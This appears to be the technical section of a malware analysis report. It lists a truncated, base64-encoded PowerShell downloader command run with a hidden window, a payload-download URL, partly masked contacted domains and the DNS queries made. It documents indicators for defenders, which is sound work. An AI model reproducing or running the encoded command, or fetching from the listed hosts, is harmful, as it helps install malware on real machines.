Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABFAFgAUgBWAEUAZgByAHIAPQAnAFgARwBEAEYATQB1AG4AcwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAQwBVAHIASQBgAFQAWQBQAFIATwBgAFQAbwBDAGAATwBsACIAIAA9AC...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1960
- %TEMP%\1222751.cvr
- 'ko##aci.com':443
- 'la####anemusic.com':80
- 'la####anemusic.com':443
- 'ki###nime24.com':443
- 'pk#.goog':80
- 'qi###long.com':443
- http://la####anemusic.com/uploads/ih_03_krekp/
- http://pk#.goog/gsr1/gsr1.crt
- 'ko##aci.com':443
- 'la####anemusic.com':443
- 'ki###nime24.com':443
- DNS ASK ko##aci.com
- DNS ASK la####anemusic.com
- DNS ASK ki###nime24.com
- DNS ASK pk#.goog
- DNS ASK qi###long.com
- DNS ASK la###c.com.br
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABFAFgAUgBWAEUAZgByAHIAPQAnAFgARwBEAEYATQB1AG4AcwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAQwBVAHIASQBgAFQAWQBQAFIATwBgAFQAbwBDAGAATwBsACIAIAA9AC...' (with hidden window)